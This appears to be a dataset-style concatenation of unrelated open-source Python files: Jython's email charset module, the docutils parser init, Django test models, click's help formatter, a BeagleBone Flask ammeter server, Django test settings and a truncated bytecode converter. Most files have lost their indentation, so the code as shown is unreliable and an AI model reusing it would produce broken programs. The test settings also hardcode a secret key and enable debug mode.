# Aliases for other commonly-used names for character sets. Map
# them to the real ones used in email.
ALIASES = {
'latin_1': 'iso-8859-1',
'latin-1': 'iso-8859-1',
'latin_2': 'iso-8859-2',
'latin-2': 'iso-8859-2',
'latin_3': 'iso-8859-3',
'latin-3': 'iso-8859-3',
'latin_4': 'iso-8859-4',
'latin-4': 'iso-8859-4',
'latin_5': 'iso-8859-9',
'latin-5': 'iso-8859-9',
'latin_6': 'iso-8859-10',
'latin-6': 'iso-8859-10',
'latin_7': 'iso-8859-13',
'latin-7': 'iso-8859-13',
'latin_8': 'iso-8859-14',
'latin-8': 'iso-8859-14',
'latin_9': 'iso-8859-15',
'latin-9': 'iso-8859-15',
'cp949': 'ks_c_5601-1987',
'euc_jp': 'euc-jp',
'euc_kr': 'euc-kr',
'ascii': 'us-ascii',
}
# Map charsets to their Unicode codec strings.
CODEC_MAP = {
'gb2312': 'eucgb2312_cn',
'big5': 'big5_tw',
# Hack: We don't want *any* conversion for stuff marked us-ascii, as all
# sorts of garbage might be sent to us in the guise of 7-bit us-ascii.
# Let that stuff pass through without conversion to/from Unicode.
'us-ascii': None,
}
# Convenience functions for extending the above mappings
def add_charset(charset, header_enc=None, body_enc=None, output_charset=None):
"""Add character set properties to the global registry.
charset is the input character set, and must be the canonical name of a
character set.
Optional header_enc and body_enc is either Charset.QP for
quoted-printable, Charset.BASE64 for base64 encoding, Charset.SHORTEST for
the shortest of qp or base64 encoding, or None for no encoding. SHORTEST
is only valid for header_enc. It describes how message headers and
message bodies in the input charset are to be encoded. Default is no
encoding.
Optional output_charset is the character set that the output should be
in. Conversions will proceed from input charset, to Unicode, to the
output charset when the method Charset.convert() is called. The default
is to output in the same character set as the input.
Both input_charset and output_charset must have Unicode codec entries in
the module's charset-to-codec mapping; use add_codec(charset, codecname)
to add codecs the module does not know about. See the codecs module's
documentation for more information.
"""
if body_enc == SHORTEST:
raise ValueError('SHORTEST not allowed for body_enc')
CHARSETS[charset] = (header_enc, body_enc, output_charset)
def add_alias(alias, canonical):
"""Add a character set alias.
alias is the alias name, e.g. latin-1
canonical is the character set's canonical name, e.g. iso-8859-1
"""
ALIASES[alias] = canonical
def add_codec(charset, codecname):
"""Add a codec that map characters in the given charset to/from Unicode.
charset is the canonical name of a character set. codecname is the name
of a Python codec, as appropriate for the second argument to the unicode()
built-in, or to the encode() method of a Unicode string.
"""
CODEC_MAP[charset] = codecname
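# Illustrative sketch (editor addition): a small, hedged helper showing how the three
# registration functions above combine for a charset this module does not know about.
# The charset name 'x-example' and its codec choice are hypothetical placeholders.
def _register_example_charset():
    add_charset('x-example', QP, BASE64, 'utf-8')
    add_alias('example', 'x-example')
    add_codec('x-example', 'utf-8')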
class Charset:
"""Map character sets to their email properties.
This class provides information about the requirements imposed on email
for a specific character set. It also provides convenience routines for
converting between character sets, given the availability of the
applicable codecs. Given a character set, it will do its best to provide
information on how to use that character set in an email in an
RFC-compliant way.
Certain character sets must be encoded with quoted-printable or base64
when used in email headers or bodies. Certain character sets must be
converted outright, and are not allowed in email. Instances of this
module expose the following information about a character set:
input_charset: The initial character set specified. Common aliases
are converted to their `official' email names (e.g. latin_1
is converted to iso-8859-1). Defaults to 7-bit us-ascii.
header_encoding: If the character set must be encoded before it can be
used in an email header, this attribute will be set to
Charset.QP (for quoted-printable), Charset.BASE64 (for
base64 encoding), or Charset.SHORTEST for the shortest of
QP or BASE64 encoding. Otherwise, it will be None.
body_encoding: Same as header_encoding, but describes the encoding for the
mail message's body, which indeed may be different than the
header encoding. Charset.SHORTEST is not allowed for
body_encoding.
    output_charset: Some character sets must be converted before they can be
used in email headers or bodies. If the input_charset is
one of them, this attribute will contain the name of the
charset output will be converted to. Otherwise, it will
be None.
input_codec: The name of the Python codec used to convert the
input_charset to Unicode. If no conversion codec is
necessary, this attribute will be None.
output_codec: The name of the Python codec used to convert Unicode
to the output_charset. If no conversion codec is necessary,
this attribute will have the same value as the input_codec.
"""
def __init__(self, input_charset=DEFAULT_CHARSET):
# RFC 2046, $4.1.2 says charsets are not case sensitive. We coerce to
# unicode because its .lower() is locale insensitive. If the argument
# is already a unicode, we leave it at that, but ensure that the
# charset is ASCII, as the standard (RFC XXX) requires.
try:
if isinstance(input_charset, unicode):
input_charset.encode('ascii')
else:
input_charset = unicode(input_charset, 'ascii')
except UnicodeError:
raise errors.CharsetError(input_charset)
input_charset = input_charset.lower()
# Set the input charset after filtering through the aliases
self.input_charset = ALIASES.get(input_charset, input_charset)
# We can try to guess which encoding and conversion to use by the
# charset_map dictionary. Try that first, but let the user override
# it.
henc, benc, conv = CHARSETS.get(self.input_charset,
(SHORTEST, BASE64, None))
if not conv:
conv = self.input_charset
# Set the attributes, allowing the arguments to override the default.
self.header_encoding = henc
self.body_encoding = benc
self.output_charset = ALIASES.get(conv, conv)
# Now set the codecs. If one isn't defined for input_charset,
# guess and try a Unicode codec with the same name as input_codec.
self.input_codec = CODEC_MAP.get(self.input_charset,
self.input_charset)
self.output_codec = CODEC_MAP.get(self.output_charset,
self.output_charset)
def __str__(self):
return self.input_charset.lower()
__repr__ = __str__
def __eq__(self, other):
return str(self) == str(other).lower()
def __ne__(self, other):
return not self.__eq__(other)
def get_body_encoding(self):
"""Return the content-transfer-encoding used for body encoding.
This is either the string `quoted-printable' or `base64' depending on
the encoding used, or it is a function in which case you should call
the function with a single argument, the Message object being
encoded. The function should then set the Content-Transfer-Encoding
header itself to whatever is appropriate.
Returns "quoted-printable" if self.body_encoding is QP.
Returns "base64" if self.body_encoding is BASE64.
Returns "7bit" otherwise.
"""
assert self.body_encoding <> SHORTEST
if self.body_encoding == QP:
return 'quoted-printable'
elif self.body_encoding == BASE64:
return 'base64'
else:
return encode_7or8bit
def convert(self, s):
"""Convert a string from the input_codec to the output_codec."""
if self.input_codec <> self.output_codec:
return unicode(s, self.input_codec).encode(self.output_codec)
else:
return s
def to_splittable(self, s):
"""Convert a possibly multibyte string to a safely splittable format.
Uses the input_codec to try and convert the string to Unicode, so it
can be safely split on character boundaries (even for multibyte
characters).
Returns the string as-is if it isn't known how to convert it to
Unicode with the input_charset.
Characters that could not be converted to Unicode will be replaced
with the Unicode replacement character U+FFFD.
"""
if isinstance(s, unicode) or self.input_codec is None:
return s
try:
return unicode(s, self.input_codec, 'replace')
except LookupError:
# Input codec not installed on system, so return the original
# string unchanged.
return s
def from_splittable(self, ustr, to_output=True):
"""Convert a splittable string back into an encoded string.
Uses the proper codec to try and convert the string from Unicode back
into an encoded format. Return the string as-is if it is not Unicode,
or if it could not be converted from Unicode.
Characters that could not be converted from Unicode will be replaced
with an appropriate character (usually '?').
If to_output is True (the default), uses output_codec to convert to an
encoded format. If to_output is False, uses input_codec.
"""
if to_output:
codec = self.output_codec
else:
codec = self.input_codec
if not isinstance(ustr, unicode) or codec is None:
return ustr
try:
return ustr.encode(codec, 'replace')
except LookupError:
# Output codec not installed
return ustr
def get_output_charset(self):
"""Return the output character set.
This is self.output_charset if that is not None, otherwise it is
self.input_charset.
"""
return self.output_charset or self.input_charset
def encoded_header_len(self, s):
"""Return the length of the encoded header string."""
cset = self.get_output_charset()
# The len(s) of a 7bit encoding is len(s)
if self.header_encoding == BASE64:
return email.base64mime.base64_len(s) + len(cset) + MISC_LEN
elif self.header_encoding == QP:
return email.quoprimime.header_quopri_len(s) + len(cset) + MISC_LEN
elif self.header_encoding == SHORTEST:
lenb64 = email.base64mime.base64_len(s)
lenqp = email.quoprimime.header_quopri_len(s)
return min(lenb64, lenqp) + len(cset) + MISC_LEN
else:
return len(s)
def header_encode(self, s, convert=False):
"""Header-encode a string, optionally converting it to output_charset.
If convert is True, the string will be converted from the input
charset to the output charset automatically. This is not useful for
multibyte character sets, which have line length issues (multibyte
characters must be split on a character, not a byte boundary); use the
high-level Header class to deal with these issues. convert defaults
to False.
The type of encoding (base64 or quoted-printable) will be based on
self.header_encoding.
"""
cset = self.get_output_charset()
if convert:
s = self.convert(s)
# 7bit/8bit encodings return the string unchanged (modulo conversions)
if self.header_encoding == BASE64:
return email.base64mime.header_encode(s, cset)
elif self.header_encoding == QP:
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
elif self.header_encoding == SHORTEST:
lenb64 = email.base64mime.base64_len(s)
lenqp = email.quoprimime.header_quopri_len(s)
if lenb64 < lenqp:
return email.base64mime.header_encode(s, cset)
else:
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
else:
return s
def body_encode(self, s, convert=True):
"""Body-encode a string and convert it to output_charset.
If convert is True (the default), the string will be converted from
the input charset to output charset automatically. Unlike
header_encode(), there are no issues with byte boundaries and
multibyte charsets in email bodies, so this is usually pretty safe.
The type of encoding (base64 or quoted-printable) will be based on
self.body_encoding.
"""
if convert:
s = self.convert(s)
        # 7bit/8bit encodings return the string unchanged (modulo conversions)
if self.body_encoding is BASE64:
return email.base64mime.body_encode(s)
elif self.body_encoding is QP:
return email.quoprimime.body_encode(s)
else:
return s
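# Illustrative sketch (editor addition): a minimal, hedged use of the Charset class
# documented above; it only runs when this module is executed directly.
if __name__ == '__main__':
    cs = Charset('latin_1')            # alias, resolves to iso-8859-1
    print cs.get_output_charset()      # -> 'iso-8859-1'
    print cs.get_body_encoding()       # -> 'quoted-printable'
    print cs.header_encode('Hello world')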
| zephyrplugins/zephyr | zephyr.plugin.jython/jython2.5.2rc3/Lib/email/charset.py | Python | epl-1.0 | 15,684 |
# $Id: __init__.py 7646 2013-04-17 14:17:37Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
This package contains Docutils parser modules.
"""
__docformat__ = 'reStructuredText'
import sys
from docutils import Component
if sys.version_info < (2,5):
from docutils._compat import __import__
class Parser(Component):
component_type = 'parser'
config_section = 'parsers'
def parse(self, inputstring, document):
"""Override to parse `inputstring` into document tree `document`."""
raise NotImplementedError('subclass must override this method')
def setup_parse(self, inputstring, document):
"""Initial parse setup. Call at start of `self.parse()`."""
self.inputstring = inputstring
self.document = document
document.reporter.attach_observer(document.note_parse_message)
def finish_parse(self):
"""Finalize parse details. Call at end of `self.parse()`."""
self.document.reporter.detach_observer(
self.document.note_parse_message)
_parser_aliases = {
'restructuredtext': 'rst',
'rest': 'rst',
'restx': 'rst',
'rtxt': 'rst',}
def get_parser_class(parser_name):
"""Return the Parser class from the `parser_name` module."""
parser_name = parser_name.lower()
if parser_name in _parser_aliases:
parser_name = _parser_aliases[parser_name]
try:
module = __import__(parser_name, globals(), locals(), level=1)
except ImportError:
module = __import__(parser_name, globals(), locals(), level=0)
return module.Parser
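# Illustrative sketch (editor addition): a hedged example of the alias handling in
# get_parser_class() above; it assumes the reStructuredText parser shipped with
# Docutils is importable.
if __name__ == '__main__':
    rst_parser_class = get_parser_class('restructuredtext')  # alias -> 'rst'
    print(rst_parser_class.__name__)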
| JulienMcJay/eclock | windows/Python27/Lib/site-packages/docutils/parsers/__init__.py | Python | gpl-2.0 | 1,657 |
"""
Generic relations
Generic relations let an object have a foreign key to any object through a
content-type/object-id field. A ``GenericForeignKey`` field can point to any
object, be it animal, vegetable, or mineral.
The canonical example is tags (although this example implementation is *far*
from complete).
"""
from __future__ import unicode_literals
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class TaggedItem(models.Model):
"""A tag on an item."""
tag = models.SlugField()
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
class Meta:
ordering = ["tag", "content_type__model"]
def __str__(self):
return self.tag
class ValuableTaggedItem(TaggedItem):
value = models.PositiveIntegerField()
class AbstractComparison(models.Model):
comparative = models.CharField(max_length=50)
content_type1 = models.ForeignKey(ContentType, models.CASCADE, related_name="comparative1_set")
object_id1 = models.PositiveIntegerField()
first_obj = GenericForeignKey(ct_field="content_type1", fk_field="object_id1")
@python_2_unicode_compatible
class Comparison(AbstractComparison):
"""
A model that tests having multiple GenericForeignKeys. One is defined
through an inherited abstract model and one defined directly on this class.
"""
content_type2 = models.ForeignKey(ContentType, models.CASCADE, related_name="comparative2_set")
object_id2 = models.PositiveIntegerField()
other_obj = GenericForeignKey(ct_field="content_type2", fk_field="object_id2")
def __str__(self):
return "%s is %s than %s" % (self.first_obj, self.comparative, self.other_obj)
@python_2_unicode_compatible
class Animal(models.Model):
common_name = models.CharField(max_length=150)
latin_name = models.CharField(max_length=150)
tags = GenericRelation(TaggedItem, related_query_name='animal')
comparisons = GenericRelation(Comparison,
object_id_field="object_id1",
content_type_field="content_type1")
def __str__(self):
return self.common_name
@python_2_unicode_compatible
class Vegetable(models.Model):
name = models.CharField(max_length=150)
is_yucky = models.BooleanField(default=True)
tags = GenericRelation(TaggedItem)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Mineral(models.Model):
name = models.CharField(max_length=150)
hardness = models.PositiveSmallIntegerField()
# note the lack of an explicit GenericRelation here...
def __str__(self):
return self.name
class GeckoManager(models.Manager):
def get_queryset(self):
return super(GeckoManager, self).get_queryset().filter(has_tail=True)
class Gecko(models.Model):
has_tail = models.BooleanField(default=False)
objects = GeckoManager()
# To test fix for #11263
class Rock(Mineral):
tags = GenericRelation(TaggedItem)
class ManualPK(models.Model):
id = models.IntegerField(primary_key=True)
tags = GenericRelation(TaggedItem, related_query_name='manualpk')
class ForProxyModelModel(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
obj = GenericForeignKey(for_concrete_model=False)
title = models.CharField(max_length=255, null=True)
class ForConcreteModelModel(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
obj = GenericForeignKey()
class ConcreteRelatedModel(models.Model):
bases = GenericRelation(ForProxyModelModel, for_concrete_model=False)
class ProxyRelatedModel(ConcreteRelatedModel):
class Meta:
proxy = True
# To test fix for #7551
class AllowsNullGFK(models.Model):
content_type = models.ForeignKey(ContentType, models.SET_NULL, null=True)
object_id = models.PositiveIntegerField(null=True)
content_object = GenericForeignKey()
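# Illustrative sketch (editor addition): a hedged example of the tagging pattern these
# models exercise. It assumes a configured Django project with these models migrated;
# the object values are hypothetical.
def _tag_an_animal_example():
    lion = Animal.objects.create(common_name="Lion", latin_name="Panthera leo")
    lion.tags.create(tag="fierce")  # through the GenericRelation declared on Animal
    return TaggedItem.objects.filter(animal__common_name="Lion")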
| megaumi/django | tests/generic_relations/models.py | Python | bsd-3-clause | 4,327 |
from contextlib import contextmanager
from .termui import get_terminal_size
from .parser import split_opt
from ._compat import term_len
# Can force a width. This is used by the test system
FORCED_WIDTH = None
def measure_table(rows):
widths = {}
for row in rows:
for idx, col in enumerate(row):
widths[idx] = max(widths.get(idx, 0), term_len(col))
return tuple(y for x, y in sorted(widths.items()))
def iter_rows(rows, col_count):
for row in rows:
row = tuple(row)
yield row + ('',) * (col_count - len(row))
def wrap_text(text, width=78, initial_indent='', subsequent_indent='',
preserve_paragraphs=False):
"""A helper function that intelligently wraps text. By default, it
assumes that it operates on a single paragraph of text but if the
`preserve_paragraphs` parameter is provided it will intelligently
handle paragraphs (defined by two empty lines).
If paragraphs are handled, a paragraph can be prefixed with an empty
line containing the ``\\b`` character (``\\x08``) to indicate that
no rewrapping should happen in that block.
:param text: the text that should be rewrapped.
:param width: the maximum width for the text.
:param initial_indent: the initial indent that should be placed on the
first line as a string.
:param subsequent_indent: the indent string that should be placed on
each consecutive line.
:param preserve_paragraphs: if this flag is set then the wrapping will
intelligently handle paragraphs.
"""
from ._textwrap import TextWrapper
text = text.expandtabs()
wrapper = TextWrapper(width, initial_indent=initial_indent,
subsequent_indent=subsequent_indent,
replace_whitespace=False)
if not preserve_paragraphs:
return wrapper.fill(text)
p = []
buf = []
indent = None
def _flush_par():
if not buf:
return
if buf[0].strip() == '\b':
p.append((indent or 0, True, '\n'.join(buf[1:])))
else:
p.append((indent or 0, False, ' '.join(buf)))
del buf[:]
for line in text.splitlines():
if not line:
_flush_par()
indent = None
else:
if indent is None:
orig_len = term_len(line)
line = line.lstrip()
indent = orig_len - term_len(line)
buf.append(line)
_flush_par()
rv = []
for indent, raw, text in p:
with wrapper.extra_indent(' ' * indent):
if raw:
rv.append(wrapper.indent_only(text))
else:
rv.append(wrapper.fill(text))
return '\n\n'.join(rv)
class HelpFormatter(object):
"""This class helps with formatting text-based help pages. It's
usually just needed for very special internal cases, but it's also
exposed so that developers can write their own fancy outputs.
At present, it always writes into memory.
:param indent_increment: the additional increment for each level.
:param width: the width for the text. This defaults to the terminal
width clamped to a maximum of 78.
"""
def __init__(self, indent_increment=2, width=None, max_width=None):
self.indent_increment = indent_increment
if max_width is None:
max_width = 80
if width is None:
width = FORCED_WIDTH
if width is None:
width = max(min(get_terminal_size()[0], max_width) - 2, 50)
self.width = width
self.current_indent = 0
self.buffer = []
def write(self, string):
"""Writes a unicode string into the internal buffer."""
self.buffer.append(string)
def indent(self):
"""Increases the indentation."""
self.current_indent += self.indent_increment
def dedent(self):
"""Decreases the indentation."""
self.current_indent -= self.indent_increment
def write_usage(self, prog, args='', prefix='Usage: '):
"""Writes a usage line into the buffer.
:param prog: the program name.
:param args: whitespace separated list of arguments.
:param prefix: the prefix for the first line.
"""
usage_prefix = '%*s%s ' % (self.current_indent, prefix, prog)
text_width = self.width - self.current_indent
if text_width >= (term_len(usage_prefix) + 20):
# The arguments will fit to the right of the prefix.
indent = ' ' * term_len(usage_prefix)
self.write(wrap_text(args, text_width,
initial_indent=usage_prefix,
subsequent_indent=indent))
else:
# The prefix is too long, put the arguments on the next line.
self.write(usage_prefix)
self.write('\n')
indent = ' ' * (max(self.current_indent, term_len(prefix)) + 4)
self.write(wrap_text(args, text_width,
initial_indent=indent,
subsequent_indent=indent))
self.write('\n')
def write_heading(self, heading):
"""Writes a heading into the buffer."""
self.write('%*s%s:\n' % (self.current_indent, '', heading))
def write_paragraph(self):
"""Writes a paragraph into the buffer."""
if self.buffer:
self.write('\n')
def write_text(self, text):
"""Writes re-indented text into the buffer. This rewraps and
preserves paragraphs.
"""
text_width = max(self.width - self.current_indent, 11)
indent = ' ' * self.current_indent
self.write(wrap_text(text, text_width,
initial_indent=indent,
subsequent_indent=indent,
preserve_paragraphs=True))
self.write('\n')
def write_dl(self, rows, col_max=30, col_spacing=2):
"""Writes a definition list into the buffer. This is how options
and commands are usually formatted.
:param rows: a list of two item tuples for the terms and values.
:param col_max: the maximum width of the first column.
:param col_spacing: the number of spaces between the first and
second column.
"""
rows = list(rows)
widths = measure_table(rows)
if len(widths) != 2:
raise TypeError('Expected two columns for definition list')
first_col = min(widths[0], col_max) + col_spacing
for first, second in iter_rows(rows, len(widths)):
self.write('%*s%s' % (self.current_indent, '', first))
if not second:
self.write('\n')
continue
if term_len(first) <= first_col - col_spacing:
self.write(' ' * (first_col - term_len(first)))
else:
self.write('\n')
self.write(' ' * (first_col + self.current_indent))
text_width = max(self.width - first_col - 2, 10)
lines = iter(wrap_text(second, text_width).splitlines())
if lines:
self.write(next(lines) + '\n')
for line in lines:
self.write('%*s%s\n' % (
first_col + self.current_indent, '', line))
else:
self.write('\n')
@contextmanager
def section(self, name):
"""Helpful context manager that writes a paragraph, a heading,
and the indents.
:param name: the section name that is written as heading.
"""
self.write_paragraph()
self.write_heading(name)
self.indent()
try:
yield
finally:
self.dedent()
@contextmanager
def indentation(self):
"""A context manager that increases the indentation."""
self.indent()
try:
yield
finally:
self.dedent()
def getvalue(self):
"""Returns the buffer contents."""
return ''.join(self.buffer)
def join_options(options):
"""Given a list of option strings this joins them in the most appropriate
way and returns them in the form ``(formatted_string,
any_prefix_is_slash)`` where the second item in the tuple is a flag that
indicates if any of the option prefixes was a slash.
"""
rv = []
any_prefix_is_slash = False
for opt in options:
prefix = split_opt(opt)[0]
if prefix == '/':
any_prefix_is_slash = True
rv.append((len(prefix), opt))
rv.sort(key=lambda x: x[0])
rv = ', '.join(x[1] for x in rv)
return rv, any_prefix_is_slash
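# Illustrative sketch (editor addition): a minimal, hedged use of HelpFormatter as
# documented above; the program and option names are hypothetical.
if __name__ == '__main__':
    formatter = HelpFormatter(width=40)
    formatter.write_usage('example-cli', '[OPTIONS] SRC DST')
    with formatter.section('Options'):
        formatter.write_dl([
            ('-v, --verbose', 'Enable verbose output.'),
            ('--help', 'Show this message and exit.'),
        ])
    print(formatter.getvalue())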
| wildchildyn/autism-website | yanni_env/lib/python3.6/site-packages/click/formatting.py | Python | gpl-3.0 | 8,889 |
#!/usr/bin/env python
#
# BBB-Network-Ammeter
#
# Copyright (c) 2016, Forest Crossman <[email protected]>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from datetime import datetime
from lxml import etree
from flask import Flask, Response
from Adafruit_BBIO import ADC
app = Flask(__name__)
def get_current():
voltage = get_adc_voltage()
current = 109.2 * voltage + 5.3688
return current
def get_adc_voltage():
# Read a value from the ADC
value = ADC.read("P9_39") # AIN0
# Convert the number to a voltage
voltage = value * 1.8
return voltage
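# Worked example (illustrative): if ADC.read() returns 0.5, get_adc_voltage()
# yields 0.5 * 1.8 = 0.9 V, and get_current() maps that to
# 109.2 * 0.9 + 5.3688 = 103.6488 (amperes, per this script's calibration).
# The linear coefficients are device-specific calibration constants baked into
# this script; treat them as an assumption of this particular sensor setup.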
@app.route("/sample")
def sample():
voltage = get_adc_voltage()
return Response("{:.03f} V".format(voltage))
@app.route("/probe")
def probe():
'''Generate a response for probe requests'''
mtconnect_schema = "urn:mtconnect.org:MTConnectDevices:1.3"
schema_url = "http://www.mtconnect.org/schemas/MTConnectDevices_1.3.xsd"
xsi = "http://www.w3.org/2001/XMLSchema-instance"
MTConnectDevices = etree.Element("MTConnectDevices",
nsmap={
None: mtconnect_schema,
"xsi": xsi,
"m": mtconnect_schema,
}
)
MTConnectDevices.attrib["{{{pre}}}schemaLocation".format(pre=xsi)] = \
"{schema} {schema_url}".format(schema=mtconnect_schema, schema_url=schema_url)
creation_time = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
Header = etree.SubElement(MTConnectDevices, "Header",
creationTime=creation_time,
instanceId="0",
sender="mtcagent",
bufferSize="0",
version="0.1",
assetCount="1",
)
Devices = etree.SubElement(MTConnectDevices, "Devices")
Device = etree.SubElement(Devices, "Device",
id="dev",
iso841Class="6",
name="currentSensor",
sampleInterval="10",
uuid="0",
)
Description = etree.SubElement(Device, "Description",
manufacturer="RPI MILL",
)
DataItems_0 = etree.SubElement(Device, "DataItems")
DataItem_0 = etree.SubElement(DataItems_0, "DataItem",
category="EVENT",
id="avail",
type="MACHINE_ON",
)
Components_0 = etree.SubElement(Device, "Components")
Axes = etree.SubElement(Components_0, "Axes", id="ax", name="Axes")
Components_1 = etree.SubElement(Axes, "Components")
Linear = etree.SubElement(Components_1, "Linear", id="x1", name="X")
DataItems_1 = etree.SubElement(Linear, "DataItems")
DataItem_1 = etree.SubElement(DataItems_1, "DataItem",
category="SAMPLE",
id="current1",
name="current1",
nativeUnits="AMPERE",
subType="ACTUAL",
type="CURRENT",
units="AMPERE",
)
response = etree.tostring(MTConnectDevices,
pretty_print=True,
xml_declaration=True,
encoding='UTF-8'
)
return Response(response, mimetype='text/xml')
@app.route("/current")
def current():
mtconnect_schema = "urn:mtconnect.org:MTConnectStreams:1.3"
schema_url = "http://www.mtconnect.org/schemas/MTConnectStreams_1.3.xsd"
xsi = "http://www.w3.org/2001/XMLSchema-instance"
MTConnectStreams = etree.Element("MTConnectStreams",
nsmap={
None: mtconnect_schema,
"xsi": xsi,
"m": mtconnect_schema,
}
)
MTConnectStreams.attrib["{{{pre}}}schemaLocation".format(pre=xsi)] = \
"{schema} {schema_url}".format(schema=mtconnect_schema, schema_url=schema_url)
creation_time = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
Header = etree.SubElement(MTConnectStreams, "Header",
creationTime=creation_time,
instanceId="0",
sender="mtcagent",
bufferSize="0",
version="0.1",
assetCount="1",
)
Streams = etree.SubElement(MTConnectStreams, "Streams")
DeviceStream = etree.SubElement(Streams, "DeviceStream",
name="VMC-3Axis",
uuid="0",
)
ComponentStream = etree.SubElement(DeviceStream, "ComponentStream",
component="Rotary",
name="C",
componentId="c1",
)
Samples = etree.SubElement(ComponentStream, "Samples")
Current = etree.SubElement(Samples, "Current",
dataItemId="c2",
timestamp=datetime.utcnow().isoformat(),
name="Scurrent",
sequence="8403169415",
subType="ACTUAL",
)
Current.text = "{current:.03f}".format(current=get_current())
Events = etree.SubElement(ComponentStream, "Events")
MachineMode = etree.SubElement(Events, "MachineMode",
dataItemId="machineMode",
timestamp=datetime.utcnow().isoformat(),
name="Cmode",
sequence="18"
)
MachineMode.text = "ON"
response = etree.tostring(MTConnectStreams,
pretty_print=True,
xml_declaration=True,
encoding='UTF-8'
)
return Response(response, mimetype='text/xml')
if __name__ == "__main__":
ADC.setup()
app.run(host='0.0.0.0', debug=False)
| cyrozap/BBB-Network-Ammeter | server.py | Python | isc | 5,648 |
# Django settings for test_project project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.db',
}
}
TIME_ZONE = 'Etc/UTC'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
STATIC_URL = '/static/'
SECRET_KEY = 't^4dt#fkxftpborp@%lg*#h2wj%vizl)#pkkt$&0f7b87rbu6y'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'test_project.urls'
WSGI_APPLICATION = 'test_project.wsgi.application'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'django.contrib.admin',
'djcelery',
'django_nose',
'useful', # Import the app to run tests
)
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
TEMPLATE_CONTEXT_PROCESSORS = (
'useful.context_processors.settings',
)
BROKER_BACKEND = 'memory'
CELERY_ALWAYS_EAGER = True
from datetime import timedelta
CELERYBEAT_SCHEDULE = {
'cleanup': {
'task': 'useful.tasks.call_management_command',
'schedule': timedelta(seconds=10),
'args': ('validate', ),
},
}
| yprez/django-useful | test_project/test_project_py2/settings.py | Python | isc | 1,842 |
from flatten import *
POS_SIZE = 2**23 - 1
NEG_SIZE = -2**23
OPTIMIZE = True
OPTIMIZERS = {
'set': 'SET',
'setglobal': 'SET_GLOBAL',
'local': 'SET_LOCAL',
'get': 'GET',
'getglobal': 'GET_GLOBAL',
'return': 'RETURN',
'recurse': 'RECURSE',
'drop': 'DROP',
'dup': 'DUP',
'[]': 'NEW_LIST',
'{}': 'NEW_DICT',
'swap': 'SWAP',
'rot': 'ROT',
'over': 'OVER',
'pop-from': 'POP_FROM',
'push-to': 'PUSH_TO',
'push-through': 'PUSH_THROUGH',
'has': 'HAS_DICT',
'get-from': 'GET_DICT',
'set-to': 'SET_DICT',
'raise': 'RAISE',
'reraise': 'RERAISE',
'call': 'CALL',
}
ARGED_OPT = set('SET SET_LOCAL SET_GLOBAL GET GET_GLOBAL'.split())
positional_instructions = set('JMP JMPZ LABDA JMPEQ JMPNE ENTER_ERRHAND'.split())
def convert(filename, flat):
bytecode = [SingleInstruction('SOURCE_FILE', String(None, '"' + filename))]
for k in flat:
if isinstance(k, SingleInstruction):
bytecode.append(k)
elif isinstance(k, Code):
for w in k.words:
if isinstance(w, ProperWord):
if OPTIMIZE and w.value in OPTIMIZERS:
if OPTIMIZERS[w.value] in ARGED_OPT:
if bytecode and bytecode[-1].opcode == 'PUSH_LITERAL' and isinstance(bytecode[-1].ref, Ident):
s = bytecode.pop().ref
else:
bytecode.append(SingleInstruction('PUSH_WORD', w))
continue
else:
s = 0
bytecode.append(SingleInstruction(OPTIMIZERS[w.value], s))
elif w.value == 'for':
mstart = Marker()
mend = Marker()
bytecode.extend([
mstart,
SingleInstruction('DUP', 0),
SingleInstruction('JMPZ', mend),
SingleInstruction('CALL', 0),
SingleInstruction('JMP', mstart),
mend,
SingleInstruction('DROP', 0)
])
elif w.value == '(:split:)':
mparent = Marker()
mchild = Marker()
bytecode.extend([
SingleInstruction('LABDA', mparent),
SingleInstruction('JMP', mchild),
mparent,
SingleInstruction('RETURN', 0),
mchild,
])
elif w.value == '\xce\xbb': #U+03BB GREEK SMALL LETTER LAMDA
for i in range(len(bytecode) - 1, -1, -1):
